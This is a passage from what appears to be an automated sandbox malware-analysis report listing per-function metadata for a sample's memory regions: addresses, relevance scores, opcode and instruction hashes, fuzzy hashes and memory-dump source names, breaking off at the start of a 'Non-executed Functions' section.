                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d529b217e373ddae3c1071f020722a1c1ad8d3eb3baf31542e07b8df7801bea2
                                                • Instruction ID: a4569b7af71c4e9b1ac89a507b87e8e62d7ed48f2ca2c54878446175991f32d3
                                                • Opcode Fuzzy Hash: d529b217e373ddae3c1071f020722a1c1ad8d3eb3baf31542e07b8df7801bea2
                                                • Instruction Fuzzy Hash: DCE0863A3404218B8915B69EF4647FE638A9BD4625704406FD00EC7751DE068D1747CB
                                                Function 05461E18 Relevance: .0, Instructions: 27COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d61451b4625e46424efdd4d7d7dfccd1751abe9e80ef603ae7154415f1183f27
                                                • Instruction ID: e14ed1c8fdca49c24136101ffd0f84e324c673a0abc4f4c252f452cfd98cfebc
                                                • Opcode Fuzzy Hash: d61451b4625e46424efdd4d7d7dfccd1751abe9e80ef603ae7154415f1183f27
                                                • Instruction Fuzzy Hash: 06E0ED32A5052497D610DF58F4814B6B7A9EB486653188596E90CCAB11E627DC63C7C0
                                                Function 05461AF7 Relevance: .0, Instructions: 27COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8c7a2fe9f5c1407ab4df9d7bd624d4dd6a3b9644319542b595406b4e11ae71c6
                                                • Instruction ID: 383f66f642b6ee950c8f2473c1a35579c1f2a2ff45c76776015c1986a465b1d5
                                                • Opcode Fuzzy Hash: 8c7a2fe9f5c1407ab4df9d7bd624d4dd6a3b9644319542b595406b4e11ae71c6
                                                • Instruction Fuzzy Hash: 78F05E72D101098FDB90DF78C8457ECBBB1FB04300F1485BAD418D3251E6388645CF40
                                                Function 05463C47 Relevance: .0, Instructions: 26COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8ccd5f3e666796300d736a12b0220800ad90cf1eaf9f089425517aa2900807df
                                                • Instruction ID: c4c31d475e820646b9f5c956517cb4bcc2b0e5ed455d47dec4e1de2d0a0b7f5c
                                                • Opcode Fuzzy Hash: 8ccd5f3e666796300d736a12b0220800ad90cf1eaf9f089425517aa2900807df
                                                • Instruction Fuzzy Hash: 07E0DF32B101410F8B148A3EA4189AA7BFAEFC923032540BAE908C3320ED32DC02CB50
                                                Function 054631AF Relevance: .0, Instructions: 24COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 36207ba8fab2a158b99173cf60acd89044ea9d0432e00c71328015f9496eedcc
                                                • Instruction ID: 8c1ab30c46cde2d1016849a907ad5a3df58b3978ecbc3c70fc954d585f3b8b22
                                                • Opcode Fuzzy Hash: 36207ba8fab2a158b99173cf60acd89044ea9d0432e00c71328015f9496eedcc
                                                • Instruction Fuzzy Hash: 40E068313087825BC317D66DE84058FFF93EFC12107088A2FD5058B261CE70480A83E8
                                                Function 054603E9 Relevance: .0, Instructions: 24COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 10bb36e0639c6aefc954bd6e671b1834c728ec515a6a6fe6e1f5129a7639bfc1
                                                • Instruction ID: 9a87c2e1123d280119cfed78d15be36ed138b41a88ba7a0c099f0dc69f3d3a22
                                                • Opcode Fuzzy Hash: 10bb36e0639c6aefc954bd6e671b1834c728ec515a6a6fe6e1f5129a7639bfc1
                                                • Instruction Fuzzy Hash: D8E048316482910FC71B176850757E97FF6DFDA215F1980EED4898F353C9654C028B91
                                                Function 0546EDF2 Relevance: .0, Instructions: 22COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3b69cb19415c8c795554157d538b80e8cadffc9ea5524248544bb0735aff328e
                                                • Instruction ID: 8ecf23173d05c90db80e7dba3a34609009f054783117e086164e5508b61b7e19
                                                • Opcode Fuzzy Hash: 3b69cb19415c8c795554157d538b80e8cadffc9ea5524248544bb0735aff328e
                                                • Instruction Fuzzy Hash: 6BE0D830440703CFC301DB2CD8099D5BB74BF4261474803D7E1455B361D720E4528782
                                                Function 0546FCC7 Relevance: .0, Instructions: 22COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 38a311d90cc0c45aac512f43be0f9e9ed2120cce854357979d61a661a8a29979
                                                • Instruction ID: 7e5fe76db078eac4e1a1b12655abdbfee31b0626099b086b9540ce3247239c88
                                                • Opcode Fuzzy Hash: 38a311d90cc0c45aac512f43be0f9e9ed2120cce854357979d61a661a8a29979
                                                • Instruction Fuzzy Hash: 6AE0E6B5B001099B4F056B9858514FEB7B3EBC4210B544415EA19A2750DA3149155791
                                                Function 05467A07 Relevance: .0, Instructions: 21COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f53fe7455cedf0f74a14c141b9f340e5489a6b30a57f698c98458c0a2ebf06ff
                                                • Instruction ID: ced047d455efc6bab58e6e4275940ec9ce4af03cdb3561769937878511083728
                                                • Opcode Fuzzy Hash: f53fe7455cedf0f74a14c141b9f340e5489a6b30a57f698c98458c0a2ebf06ff
                                                • Instruction Fuzzy Hash: 0CE0863DB102049BCF1099E0A9497D77F69EB04265F004473EA0686101EA3081588662
                                                Function 05463EB2 Relevance: .0, Instructions: 20COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 08b123efb8c7a09b8225b8a29cbbdcd011928b4531c69f8d6216bd7968b842de
                                                • Instruction ID: 09d24ca4654bf170a41ab0ac609f1d6a47d4ef46f3617271d5d315f78b8db3ad
                                                • Opcode Fuzzy Hash: 08b123efb8c7a09b8225b8a29cbbdcd011928b4531c69f8d6216bd7968b842de
                                                • Instruction Fuzzy Hash: 88E01A32610054CFDB00DE69E449BE873B5FB48256F4000A5E10ADB6A1CF35D986CB21
                                                Function 0546E9C0 Relevance: .0, Instructions: 20COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9b98400890ef27f46e7319052d3e7d443c5c4732b0641f77b3728915dc443fd0
                                                • Instruction ID: b4f54c97f390672fb5b59a0cfb473e8018b86d7fb2e46afb1abd95b8ecffc0ad
                                                • Opcode Fuzzy Hash: 9b98400890ef27f46e7319052d3e7d443c5c4732b0641f77b3728915dc443fd0
                                                • Instruction Fuzzy Hash: F1E026256082900FD742077094243EB3FA8AF41201B0888D7C586CB362DE200924C791
                                                Function 054603F8 Relevance: .0, Instructions: 18COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 14ca6c02d37572e472452350b12c69c1297a7a06c8d0c061b63639234bd4b3c1
                                                • Instruction ID: 968be4310c30880e2b561e0190d42b6fd24c6b939f4d3370f471b7950a57487c
                                                • Opcode Fuzzy Hash: 14ca6c02d37572e472452350b12c69c1297a7a06c8d0c061b63639234bd4b3c1
                                                • Instruction Fuzzy Hash: 7FD05E313442140BD70D6649A0107AA76DA8FC9751F14C07FE50D8F391C9B19C0047E5
                                                Function 0546ED7F Relevance: .0, Instructions: 17COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 537e322dc54e6f2208409343d9191eb82aec7497beee9dff83f5ea715ebd3093
                                                • Instruction ID: 86a0549e7167e47096a374744a24e24d9392c0b6f6c4fd9c9942d9bd60040feb
                                                • Opcode Fuzzy Hash: 537e322dc54e6f2208409343d9191eb82aec7497beee9dff83f5ea715ebd3093
                                                • Instruction Fuzzy Hash: E0D01266755831068E2A32BF64793FE174B4FD4520B44006FD08EC7782DD494E1746CB
                                                Function 0546EDF7 Relevance: .0, Instructions: 17COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3540f39940277a8b3f94f7b4e6b6d06757bbc09351cfe3feec6fadfe7890afb1
                                                • Instruction ID: 99a5d49c01f37fce4661357ced7fc885eaa5720469fd868a8bb969377fed0ded
                                                • Opcode Fuzzy Hash: 3540f39940277a8b3f94f7b4e6b6d06757bbc09351cfe3feec6fadfe7890afb1
                                                • Instruction Fuzzy Hash: 14D05E35561A05CFD300AF28D9499E9BBB8FF46A04B490296E2059B721EB20F4558A41
                                                Function 0546ED80 Relevance: .0, Instructions: 17COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 410f4d3f3c59461758abf656ce6fa81c1fccfce9aee01aad7881fd8db0286138
                                                • Instruction ID: e5e3165554948eb7156ba68763c1a981e56efe2c8a690475c76f92ab1528b231
                                                • Opcode Fuzzy Hash: 410f4d3f3c59461758abf656ce6fa81c1fccfce9aee01aad7881fd8db0286138
                                                • Instruction Fuzzy Hash: C6C01266355835034919319FA4383FF218E4BC4920B44006FD04E87781ED495E1202CF
                                                Function 0546EE38 Relevance: .0, Instructions: 17COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1572a7edc52987b8d61aec5136a996bf0028f46e4a776f3d291b6f15b3683d66
                                                • Instruction ID: 894800b7ae0a41f2178034ced0664ef1b7c12d16099bc7db594fdce5b0f4cd8c
                                                • Opcode Fuzzy Hash: 1572a7edc52987b8d61aec5136a996bf0028f46e4a776f3d291b6f15b3683d66
                                                • Instruction Fuzzy Hash: 85E0EC3181460CDECB50EF74D5485EB7BE8BB05221F00C56AE80D9A600E631D2A8CF81
                                                Function 0546E988 Relevance: .0, Instructions: 17COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 415828263eeba59e35bbe1434115ba382fc28fc8d635cdb2b6515f1e525c3856
                                                • Instruction ID: 8656dfbbdbb8d884c4e4fdcb366476dae4dc46365c330a33a62b76933cf715e3
                                                • Opcode Fuzzy Hash: 415828263eeba59e35bbe1434115ba382fc28fc8d635cdb2b6515f1e525c3856
                                                • Instruction Fuzzy Hash: C4D012797050109F8B059F28D4518EE7BA6EB99211315485BE545C7321CA31CC56C7C5
                                                Function 05462F28 Relevance: .0, Instructions: 16COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f3951c78f49d2053f8d6c4b883af219a826a92308470020a448234449500013c
                                                • Instruction ID: 2ce97e8561d6bcda409e5638d629d30b379ebe6f43fa4c9b414fbc5c087047b3
                                                • Opcode Fuzzy Hash: f3951c78f49d2053f8d6c4b883af219a826a92308470020a448234449500013c
                                                • Instruction Fuzzy Hash: 97E02B322093C46FC30257A0C810DE93F749F49210F0444D9EAC80F123C1218D63C352
                                                Function 0546E9D0 Relevance: .0, Instructions: 15COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a25635fb30564445cf479f1830b01e6a749fdb6a940969a45e74ff9bca692017
                                                • Instruction ID: 194651e4c802244b1f5e5979575ed6397877faa3e9b02b7b47b49164623abd31
                                                • Opcode Fuzzy Hash: a25635fb30564445cf479f1830b01e6a749fdb6a940969a45e74ff9bca692017
                                                • Instruction Fuzzy Hash: EFD0223130013497DB941A69A8083EF7B9CBF40751F00812AEE0B86380DF3088A0C3EA
                                                Function 0546E998 Relevance: .0, Instructions: 15COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 512dc3604cad48510b2afd552994ad15a27d83c71748dcef58b4d5fa7179f8d3
                                                • Instruction ID: 997e1394dee6e358c33429275b5f19d493b97e2d00b5b50b0cf6e501c3b06398
                                                • Opcode Fuzzy Hash: 512dc3604cad48510b2afd552994ad15a27d83c71748dcef58b4d5fa7179f8d3
                                                • Instruction Fuzzy Hash: 9AD0C932341124AF8B04AE59D404CAA77A9DB5D661301406AF905CB331CA71DC5187D5
                                                Function 05461E6F Relevance: .0, Instructions: 14COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dbb3a855c660f30c9ee453b0326cc6cc389f506efcd996f31c3d2e2dc1df802c
                                                • Instruction ID: 23753b9c3a5e3a26499e4ff2dd85bf0bcdb6a71dabe7785ac48f5135eda87744
                                                • Opcode Fuzzy Hash: dbb3a855c660f30c9ee453b0326cc6cc389f506efcd996f31c3d2e2dc1df802c
                                                • Instruction Fuzzy Hash: A1D0A732D101708FDB10EB89E244BF57755F700321F4A99A7E6699B244CB75DC80CB42
                                                Function 0546E997 Relevance: .0, Instructions: 13COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 61e39fc73801650322b164d3c30dfc8dd909f72ba4ac633f76f5ad11a0bea933
                                                • Instruction ID: 83b32dd803f8608601885f8176c225b6871b657a5e8e99cbc31692c2441753e5
                                                • Opcode Fuzzy Hash: 61e39fc73801650322b164d3c30dfc8dd909f72ba4ac633f76f5ad11a0bea933
                                                • Instruction Fuzzy Hash: BDD012767410209F8B049F58D5448A937A1DF5C621301446BF509CB330CE31CC51C7C4
                                                Function 0546EE00 Relevance: .0, Instructions: 12COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3b72ec9e0869796c825774f32fa89d9ad1d647f435744744d76cc79a435e012d
                                                • Instruction ID: 0287d1fb98a077814cbf69b66d67be724202b1a6d0fc9f4e287534da519a10c9
                                                • Opcode Fuzzy Hash: 3b72ec9e0869796c825774f32fa89d9ad1d647f435744744d76cc79a435e012d
                                                • Instruction Fuzzy Hash: 6CD01231520B04CFC300FF6CD945869B7B4FF45708B4502A5E1059B331FB21F8548B41
                                                Function 05462F38 Relevance: .0, Instructions: 11COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 60cb9a033d15d90d2f2128e5192f38a962bafc382d142d3482db3f65e99f6885
                                                • Instruction ID: b4a6434f9cd33aa2935696d914c80fc4968d6f96973067710287570d8bc52a65
                                                • Opcode Fuzzy Hash: 60cb9a033d15d90d2f2128e5192f38a962bafc382d142d3482db3f65e99f6885
                                                • Instruction Fuzzy Hash: 37C08C76300308BFDB80AFD5C800E96776DAB48720F50D009FE0C0F211C272E962DBA1
                                                Function 05463707 Relevance: .0, Instructions: 10COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9f84befa2211b92083dfee80988a1385e220c66ffaa728b24292594ff244d3fd
                                                • Instruction ID: f5c0052de68ce26d6aaf5d153b3c242bfad6cad24bb71ed7eb6f65370cdeae82
                                                • Opcode Fuzzy Hash: 9f84befa2211b92083dfee80988a1385e220c66ffaa728b24292594ff244d3fd
                                                • Instruction Fuzzy Hash: F2C08CA2A4410013E308D628AD8A259ABCB87AC20CF0CC0B4D30A89102EC34809B8292
                                                Function 05460F4F Relevance: .0, Instructions: 10COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f348e7269ff007428e174ac3868ef5ac0ef40c1210f1a98c1461474066e704ae
                                                • Instruction ID: d0682960c92bc831eaf512347b2a2cdd83a1dffbd4ba06121d44b374be8bd82b
                                                • Opcode Fuzzy Hash: f348e7269ff007428e174ac3868ef5ac0ef40c1210f1a98c1461474066e704ae
                                                • Instruction Fuzzy Hash: 2BC012321001447ACB026A91D845EED7F22AB54350F148049F6440D121D3738523DB40
                                                Function 05460F50 Relevance: .0, Instructions: 10COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c7aa40a6d195260638e7b8ee7419e8c4a0d98204b2c8f1aea2458d223408550e
                                                • Instruction ID: cf4b7e17e36e18f82f25dff4826f074e1d0f894fee277640cd5161f8aac1c98f
                                                • Opcode Fuzzy Hash: c7aa40a6d195260638e7b8ee7419e8c4a0d98204b2c8f1aea2458d223408550e
                                                • Instruction Fuzzy Hash: 30C04C72144208BBCB027E82DC05E5ABF2ABB557A4F148059FB080E161E773D673EBD5
                                                Function 0546410C Relevance: .0, Instructions: 9COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ba4b13c8fed1cd0972f700b730dcbcc1ad5837f849170ea7523aab3b0eb718c8
                                                • Instruction ID: 1d1c8e0ab9948982cc3d10443ae30d08ac3f2fbc63befeff0e40cd7c94906023
                                                • Opcode Fuzzy Hash: ba4b13c8fed1cd0972f700b730dcbcc1ad5837f849170ea7523aab3b0eb718c8
                                                • Instruction Fuzzy Hash: 6BC02B35000100DFCA00EF40CA88DE67E91FF61300780D81762000A030CA21C41CDB03
                                                Function 0546CC67 Relevance: .0, Instructions: 9COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dccf5e8039278204d38739b88340913b71f25ef9d47ed94dad9e19a791ca536c
                                                • Instruction ID: 4ba3a14d85be071ab19ddd02bb3d0bf3be6f025078de456d3ae6e22bb037112f
                                                • Opcode Fuzzy Hash: dccf5e8039278204d38739b88340913b71f25ef9d47ed94dad9e19a791ca536c
                                                • Instruction Fuzzy Hash: 5EC01234100008AFCB40CF24D085CE8BB72EF58320B1080A1F8888B322C232D812CF00
                                                Function 0546CC68 Relevance: .0, Instructions: 9COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                • Instruction ID: 61412fa5721fa0801f19765b42d0f6ac58f054d2697597a3f249e516f761f0d5
                                                • Opcode Fuzzy Hash: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                • Instruction Fuzzy Hash: 87C00235140108AFC740DF55D445D95BBA9EB59660B1180A1F9484B722C632E9119A90
                                                Function 05463C20 Relevance: .0, Instructions: 7COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 845c99eff4cf8f87a62abf7c10efdf5282a99bc7b6804700de4283cde4a2660d
                                                • Instruction ID: c0fea6dd1f2146b008bb795164f4519fa721c5e51f4ea712b203b607e4d89052
                                                • Opcode Fuzzy Hash: 845c99eff4cf8f87a62abf7c10efdf5282a99bc7b6804700de4283cde4a2660d
                                                • Instruction Fuzzy Hash: 8AC0922508F3C00FD7638B30683909C3F78292311479E20DBC0D28B5E3C204028FEB69
                                                Function 0546CC3F Relevance: .0, Instructions: 7COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 72d062c4568fa0931a5a59937d820677ad6724bb2bb9f5a23db1609b07761e63
                                                • Instruction ID: 60217d22703f17aa3922e7925dc7c12cfbb6190c8570af183ff4535c71dc44aa
                                                • Opcode Fuzzy Hash: 72d062c4568fa0931a5a59937d820677ad6724bb2bb9f5a23db1609b07761e63
                                                • Instruction Fuzzy Hash: 9CB09238946B844EC721BB3580554DEBF60BEBA210B46F69F80C0450128E110496CA52
                                                Function 0546BFF0 Relevance: .0, Instructions: 2COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3d004218a0754fb5475b920db0e9f9f81c632f334407248d43c2e83af221531e
                                                • Instruction ID: 74cadb3744cd1bb597845b2867a0932dd055f1b388799be892757646c75f5ba4
                                                • Opcode Fuzzy Hash: 3d004218a0754fb5475b920db0e9f9f81c632f334407248d43c2e83af221531e
                                                • Instruction Fuzzy Hash:

                                                Non-executed Functions

                                                Function 074B5021 Relevance: 1.6, Strings: 1, Instructions: 332COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: {#L
                                                • API String ID: 0-1361971085
                                                • Opcode ID: c4cfbf7b24a7aae9fb04575823aa615ab1a48e626ff4b3e412a2e4941a3772aa
                                                • Instruction ID: fcefac6d22a2ecdc37d6a100efe883fefb22f934879397452b6fb5d78d25d4e5
                                                • Opcode Fuzzy Hash: c4cfbf7b24a7aae9fb04575823aa615ab1a48e626ff4b3e412a2e4941a3772aa
                                                • Instruction Fuzzy Hash: 7CD105B1E15219DFDB18CFA6D9805DEFBF2BF89300F14D52AD415AB224E73499028F61
                                                Function 0726B3C8 Relevance: 1.4, Strings: 1, Instructions: 181COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
